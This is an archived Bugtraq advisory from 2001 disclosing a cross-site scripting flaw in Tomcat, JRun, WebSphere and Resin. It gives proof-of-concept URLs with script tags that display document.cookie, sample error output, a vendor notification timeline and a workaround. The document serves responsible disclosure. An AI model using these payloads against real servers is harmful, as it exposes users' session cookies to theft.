Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability

From: "TAKAGI, Hiromitsu" <takagi () etl go jp>
Date: Mon, 02 Jul 2001 20:31:00 +0900
Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
=========================================================================

Affected products:
=================
  Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
     <http://jakarta.apache.org/tomcat/>
  JRun 3.0
     <http://www.allaire.com/products/jrun/index.cfm>
  WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
     <http://www-4.ibm.com/software/webservers/>
  Resin
     <http://www.caucho.com/products/resin/>


Not affected:
============
  Unknown


Problem:
=======
  Accessing the following URLs, the JavaScript code will be executed
  in the browser on the server's domain.

  Tomcat 3.2.1:
    http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  JRun 3.0:
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml
  WebSphere 3.5 FP2:
    http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>
  WebSphere 3.02:
    http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  VisualAge for Java 3.5 Professional:
    http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT>
  Resin 1.2.2:
    http://Reisin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
    http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp

  These pages produce output like this:
  =================================================
  Error 404
  An error has occurred while processing request:
  http://WebSphere/webapp/examples/******
  
  Message: File not found: //******
  StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: //******
          at javax.servlet.ServletException.<init>(ServletException.java:107)
          at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
          at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
          at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
          ...
  =================================================
  ******: The JavaScript code is executed here.

  This vulnerability is quite similar to "IIS cross-site scripting
  vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000.
  <http://www.microsoft.com/technet/security/bulletin/ms00-060.asp>


Impact:
======
  For the detail about cross-site scripting, see the following pages.
  <http://www.cert.org/advisories/CA-2000-02.html>
  <http://www.microsoft.com/TechNet/security/crssite.asp>
  <http://www.apache.org/info/css-security/>


Vendor status:
=============

  Tomcat:
  ======
    Notified: 
      16 Mar 2001 04:32:02 +0900, I-found-a-security-problem-in-the-apache-source-code () apache org
      17 Mar 2001 18:55:45 +0900, tomcat-dev () jakarta apache org
    Response: 
      17 Mar 2001 20:07:42 -0000
    Fix: 
      30 Mar 2001, Tomcat 4.0-beta-2 (maybe)
      11 May 2001, Tomcat 3.2.2-beta-5 (maybe)
    Announcement: 
      <http://jakarta.apache.org/tomcat/news.html>

      Sun Microsystems does not publish Tomcat vulnerabilities.
      <http://java.sun.com/products/jsp/tomcat/>
      <http://java.sun.com/sfaq/chronology.html>

  JRun:
  ====
    Notified: 
      13 Mar 2001 23:11:54 +0900, secure () allaire com
    Response: 
      13 Mar 2001 09:43:49 -0500
      14 Mar 2001 09:05:03 -0500
    Fix: 
      28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available.
    Announcement: 
      <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full>
      Macromedia Product Security Bulletin (MPSB01-06) 
      JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability
      (a.k.a. JavaScript code execution vulnerability)

  WebSphere:
  =========
    Notified:
      20 Mar 2001 08:13:30 +0900, *******@us.ibm.com
    Response:
      22 Mar 2001 09:14:01 -0500
      23 Mar 2001 00:02:58 +0900
    Fix:
      PQ47386V302x (?)
      <http://www-4.ibm.com/software/webservers/appserv/efix.html>
    Announcement: 
      
<http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb>
      (in Japanese)

  Resin:
  =====
    Notified:
      16 Mar 2001 02:26:47 +0900, bugs () caucho com, resin () caucho com
    Response: 
      None
    Fix:
      Unknown
    Announcement:
      Unknown
      http://www.caucho.com/products/resin/changes.xtp

Workaround:
==========
  Customize error pages.


--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/
Previous By Date Next
Previous By Thread Next

Current thread: